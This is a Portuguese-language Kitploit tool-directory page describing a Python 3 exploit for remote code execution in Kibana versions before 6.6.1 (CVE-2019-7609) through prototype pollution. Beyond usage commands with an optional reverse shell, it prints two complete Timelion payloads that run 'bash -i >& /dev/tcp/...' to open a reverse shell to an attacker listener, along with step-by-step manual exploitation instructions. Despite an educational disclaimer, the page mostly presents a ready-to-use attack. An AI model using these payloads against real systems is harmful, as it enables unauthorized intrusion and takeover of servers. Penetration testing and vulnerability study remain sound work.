Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-7069-POC — Python 3 exploit para Kibana < 6.6.1 RCE (CVE-2019-7609) via poluição de protótipo, com detecção automática de versão e reverse shell opcional. | Kitploit
Ferramentas/GitHubGitHub/caelumisme/cve-2019-7069-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Python 3 exploit para Kibana < 6.6.1 RCE (CVE-2019-7609) via poluição de protótipo, com detecção automática de versão e reverse shell opcional.

Ver Repositório
1há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Kibana < 6.6.1 Exploit de Execução Remota de Código (CVE-2019-7609)

Banner do Exploit

🚨 Exploit RCE Educacional 🚨

Autor: LandGrey (Refatoração Python3 por [Seu Nome])
Referência: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Aviso:
Este script é apenas para testes de penetração educacionais e autorizados. Não o utilize em sistemas que não possui ou para os quais não tem permissão explícita para testar. O autor e contribuidores não se responsabilizam por qualquer uso indevido ou dano causado por esta ferramenta.


🎯 O que é isso?

Este é um script de exploit em Python 3 para a vulnerabilidade de Execução Remota de Código em versões do Kibana < 6.6.1. Ele aproveita uma falha de poluição de protótipo para executar comandos arbitrários, incluindo a abertura de uma shell reversa, em uma instância vulnerável do Kibana.

🕹️ Funcionalidades

  • Detecta a versão do Kibana automaticamente
  • Verifica o status da vulnerabilidade
  • Opcionalmente dispara uma shell reversa para o seu listener
  • Saída no terminal limpa e interativa
  • Totalmente compatível com Python 3

📚 Referências

  • Exploit-DB Entry 46651
  • Kibana Official Site
  • CVE-2019-7609

🚀 Uso

python3 kibana_exploit.py -u http://target-kibana:5601

Para disparar uma shell reversa:

python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

Exemplo

python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ Requisitos

  • Python 3.x
  • Biblioteca requests
  • Biblioteca packaging

Instale as dependências com:

pip install requests packaging

💡 Exploração Manual via Timelion

Você também pode explorar esta vulnerabilidade manualmente usando o visualizador Timelion do Kibana:

  1. Abra o Kibana
  2. Cole um dos payloads a seguir no visualizador Timelion
  3. Clique em Executar (Run)
  4. No painel esquerdo, clique em Canvas
  5. Sua shell reversa deve aparecer! :)

Payload por securityMB:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Payload por chybeta:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Substitua 192.168.1.100 e 4444 pelo IP e porta do seu próprio listener.


🧩 Como Funciona

  • Detecta a versão do Kibana através de uma requisição HTTP
  • Verifica se o alvo é vulnerável ao CVE-2019-7609
  • Explora a poluição de protótipo para executar comandos arbitrários
  • Opcionalmente, dispara uma shell reversa para o host e porta especificados

🎨 Saída

O script fornece uma saída clara e passo a passo para detecção, verificação e exploração, tornando-o fácil de acompanhar e divertido de usar!


👾 Para Diversão & Aprendizado

Este script é uma ótima maneira de aprender sobre poluição de protótipo, execução remota de código e técnicas de teste de penetração. Use-o com responsabilidade e sempre com permissão!


📝 Licença

Este projeto é apenas para uso educacional. Sem garantias ou responsabilidades. Hacking ético, mantenha-se curioso e divirta-se!

Baixar ferramenta